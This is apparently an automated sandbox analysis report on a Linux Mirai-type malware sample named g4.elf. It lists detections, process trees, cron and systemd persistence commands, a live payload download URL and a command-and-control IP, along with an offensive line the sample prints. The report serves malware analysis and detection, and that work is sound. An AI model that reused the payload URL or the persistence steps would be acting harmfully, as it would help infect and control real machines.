Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
g4.elf

Overview

General Information

Sample name:g4.elf
Analysis ID:1589852
MD5:136fb2d91874d959cfd902863dbaaa5b
SHA1:e924e85331e5a9100fe2cc3ab7f3824e6f4defe2
SHA256:1ca51bb1da94ef8e16810e8b03f86694d3fba5cd46915cdba67f7ba82482234e
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589852
Start date and time:2025-01-13 08:52:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 58s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:g4.elf
Detection:MAL
Classification:mal64.spre.troj.evad.linELF@0/6@0/0
  • VT rate limit hit for: http://103.136.41.100/g4
Command:/tmp/g4.elf
PID:5427
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5414, Parent: 3590)
  • rm (PID: 5414, Parent: 3590, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.uBHxhDQd7Y /tmp/tmp.K3ToqUjpQk /tmp/tmp.A4ESWgLvug
  • dash New Fork (PID: 5415, Parent: 3590)
  • rm (PID: 5415, Parent: 3590, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.uBHxhDQd7Y /tmp/tmp.K3ToqUjpQk /tmp/tmp.A4ESWgLvug
  • g4.elf (PID: 5427, Parent: 5350, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/g4.elf
    • g4.elf New Fork (PID: 5444, Parent: 5427)
    • sh (PID: 5444, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 5450, Parent: 5444)
      • systemctl (PID: 5450, Parent: 5444, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • g4.elf New Fork (PID: 5454, Parent: 5427)
    • sh (PID: 5454, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 5461, Parent: 5454)
      • systemctl (PID: 5461, Parent: 5454, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
    • g4.elf New Fork (PID: 5462, Parent: 5427)
    • sh (PID: 5462, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 5467, Parent: 5462)
      • crontab (PID: 5467, Parent: 5462, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • g4.elf New Fork (PID: 5468, Parent: 5427)
    • sh (PID: 5468, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 5474, Parent: 5468)
    • g4.elf New Fork (PID: 5476, Parent: 5427)
      • g4.elf New Fork (PID: 5478, Parent: 5476)
        • g4.elf New Fork (PID: 5480, Parent: 5478)
        • g4.elf New Fork (PID: 5485, Parent: 5478)
        • g4.elf New Fork (PID: 5487, Parent: 5478)
  • wrapper-2.0 (PID: 5431, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5432, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5433, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5434, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5435, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5442, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 5452, Parent: 5451)
  • snapd-env-generator (PID: 5452, Parent: 5451, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: g4.elfVirustotal: Detection: 38%Perma Link
Source: g4.elfReversingLabs: Detection: 39%
Source: global trafficTCP traffic: 192.168.2.13:52100 -> 77.90.22.16:5625
Source: global trafficTCP traffic: 192.168.2.13:48655 -> 1.1.1.1:53
Source: /tmp/g4.elf (PID: 5427)Socket: 127.0.0.1:23476Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: g4.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: g4.elf, 5427.1.00007f9d88033000.00007f9d88039000.rw-.sdmp, g4.elf, 5476.1.00007f9d88033000.00007f9d88039000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: crontab.tmp.16.dr, hello.16.dr, hello.service.16.dr, tmp.PQrdMA.42.drString found in binary or memory: http://103.136.41.100/g4
Source: g4.elf, 5427.1.00007f9d88033000.00007f9d88039000.rw-.sdmp, g4.elf, 5476.1.00007f9d88033000.00007f9d88039000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: g4.elf, 5427.1.00007f9d88033000.00007f9d88039000.rw-.sdmp, g4.elf, 5476.1.00007f9d88033000.00007f9d88039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: g4.elf, 5427.1.00007f9d88033000.00007f9d88039000.rw-.sdmp, g4.elf, 5476.1.00007f9d88033000.00007f9d88039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5431, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5432, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5433, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5434, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5435, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5442, result: successfulJump to behavior
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5431, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5432, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5433, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5434, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5435, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5427)SIGKILL sent: pid: 5442, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5467)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 5467)File: /var/spool/cron/crontabs/tmp.PQrdMAJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3631/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3631/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3631/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3631/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3631/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/5271/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/5271/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/5271/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/5271/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/5271/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5487)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/g4.elf (PID: 5454)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /tmp/g4.elf (PID: 5462)Shell command executed: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/g4.elf (PID: 5468)Shell command executed: sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /usr/bin/dash (PID: 5414)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.uBHxhDQd7Y /tmp/tmp.K3ToqUjpQk /tmp/tmp.A4ESWgLvugJump to behavior
Source: /usr/bin/dash (PID: 5415)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.uBHxhDQd7Y /tmp/tmp.K3ToqUjpQk /tmp/tmp.A4ESWgLvugJump to behavior
Source: /bin/sh (PID: 5450)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5461)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /tmp/g4.elf (PID: 5427)Reads from proc file: /proc/statJump to behavior
Source: /tmp/g4.elf (PID: 5427)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/g4.elf (PID: 5427)File: /etc/init.d/helloJump to dropped file
Source: /tmp/g4.elf (PID: 5427)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5435)Queries kernel information via 'uname': Jump to behavior
Source: g4.elf, 5427.1.00007ffd94678000.00007ffd94699000.rw-.sdmp, g4.elf, 5476.1.00007ffd94678000.00007ffd94699000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/g4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/g4.elf
Source: g4.elf, 5427.1.000055573d0a7000.000055573d1f8000.rw-.sdmp, g4.elf, 5476.1.000055573d0a7000.000055573d1f8000.rw-.sdmpBinary or memory string: =WU!/etc/qemu-binfmt/arm
Source: g4.elf, 5427.1.000055573d0a7000.000055573d1f8000.rw-.sdmp, g4.elf, 5476.1.000055573d0a7000.000055573d1f8000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: g4.elf, 5427.1.00007ffd94678000.00007ffd94699000.rw-.sdmp, g4.elf, 5476.1.00007ffd94678000.00007ffd94699000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: g4.elf, 5427.1.00007ffd94678000.00007ffd94699000.rw-.sdmpBinary or memory string: /tmp/qemu-open.3s1YMz
Source: g4.elf, 5427.1.00007ffd94678000.00007ffd94699000.rw-.sdmpBinary or memory string: :WUNv:WU/tmp/qemu-open.3s1YMz:
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
1
File Deletion
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589852 Sample: g4.elf Startdate: 13/01/2025 Architecture: LINUX Score: 64 51 1.1.1.1, 48655, 53 CLOUDFLARENETUS Australia 2->51 53 77.90.22.16, 52100, 5625 ASGHOSTNETDE Germany 2->53 55 Multi AV Scanner detection for submitted file 2->55 9 dash rm g4.elf 2->9         started        13 dash rm 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 6 other processes 2->17 signatures3 process4 file5 45 /tmp/crontab.tmp, troff 9->45 dropped 47 /etc/init.d/hello, Bourne-Again 9->47 dropped 57 Sample tries to kill multiple processes (SIGKILL) 9->57 59 Drops files in suspicious directories 9->59 19 g4.elf sh 9->19         started        21 g4.elf sh 9->21         started        23 g4.elf sh 9->23         started        25 2 other processes 9->25 signatures6 process7 process8 27 sh crontab 19->27         started        31 sh systemctl 21->31         started        33 sh systemctl 23->33         started        35 g4.elf 25->35         started        37 sh 25->37         started        file9 49 /var/spool/cron/crontabs/tmp.PQrdMA, troff 27->49 dropped 61 Sample tries to persist itself using cron 27->61 63 Executes the "crontab" command typically for achieving persistence 27->63 39 g4.elf 35->39         started        41 g4.elf 35->41         started        43 g4.elf 35->43         started        signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
g4.elf38%VirustotalBrowse
g4.elf39%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/g4100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%sg4.elffalse
    high
    http://103.136.41.100/g4crontab.tmp.16.dr, hello.16.dr, hello.service.16.dr, tmp.PQrdMA.42.drfalse
    • Avira URL Cloud: malware
    unknown
    http://1/wget.shg4.elf, 5427.1.00007f9d88033000.00007f9d88039000.rw-.sdmp, g4.elf, 5476.1.00007f9d88033000.00007f9d88039000.rw-.sdmpfalse
      high
      http://schemas.xmlsoap.org/soap/encoding/g4.elf, 5427.1.00007f9d88033000.00007f9d88039000.rw-.sdmp, g4.elf, 5476.1.00007f9d88033000.00007f9d88039000.rw-.sdmpfalse
        high
        http://9/curl.shg4.elf, 5427.1.00007f9d88033000.00007f9d88039000.rw-.sdmp, g4.elf, 5476.1.00007f9d88033000.00007f9d88039000.rw-.sdmpfalse
          high
          http://schemas.xmlsoap.org/soap/envelope/g4.elf, 5427.1.00007f9d88033000.00007f9d88039000.rw-.sdmp, g4.elf, 5476.1.00007f9d88033000.00007f9d88039000.rw-.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            77.90.22.16
            unknownGermany
            12586ASGHOSTNETDEfalse
            1.1.1.1
            unknownAustralia
            13335CLOUDFLARENETUSfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            77.90.22.16g3.elfGet hashmaliciousUnknownBrowse
              g5.elfGet hashmaliciousUnknownBrowse
                g4.elfGet hashmaliciousUnknownBrowse
                  g6.elfGet hashmaliciousUnknownBrowse
                    g3.elfGet hashmaliciousUnknownBrowse
                      m1.elfGet hashmaliciousUnknownBrowse
                        m5.elfGet hashmaliciousUnknownBrowse
                          m2.elfGet hashmaliciousUnknownBrowse
                            1.1.1.1watchdog.elfGet hashmaliciousXmrigBrowse
                            • 1.1.1.1:8080/
                            6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                            • 1.1.1.1/ctrl/playback.php
                            PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                            • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                            AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                            • 1.1.1.1/
                            INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
